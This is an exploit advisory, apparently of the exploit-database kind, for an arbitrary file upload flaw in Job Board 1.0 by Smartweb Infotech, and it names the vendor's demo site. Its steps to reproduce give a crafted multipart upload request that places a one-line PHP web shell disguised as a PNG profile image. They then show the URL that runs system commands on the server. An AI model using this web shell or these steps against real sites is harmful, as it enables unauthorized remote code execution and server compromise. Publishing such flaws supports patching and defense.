Job Board 1.0 Shell Upload

┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://demo.smartwebinfotech.site/job-board/                              ││  Vendor   : Smartweb Infotech                                                          ││  Software : Job Board 1.0 - Job Portal Management System                               ││  Vuln Type: Arbitrary File Upload Leads to RCE                                         ││  Impact   : Upload PHPshell and execute commands on the server                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to overwrite critical files simply by uploading a shell and execute    ││  commands on the server                                                                ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Steps to Reproduce:1. Go to [My Profile] on this Path (https://website/settings/account)2. Upload any Image to capture the request in Burp Suite3. Replace image.png to upload.php in [filename] and add this simple phpshellPOST /job-board/settings/account HTTP/2-----------------------------427088175318086545183087924022Content-Disposition: form-data; name="profile"; filename="shell.php"Content-Type: image/png<?php echo system($_GET['command']); ?>-----------------------------427088175318086545183087924022--4. Send the Request5. Back to the Path (https://website/settings/account)6. Refresh the Page7. Copy the Link of (Unloaded Image)8. Paste the Link of your uploaded PHPshell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id)9. RCE Executed![-] Done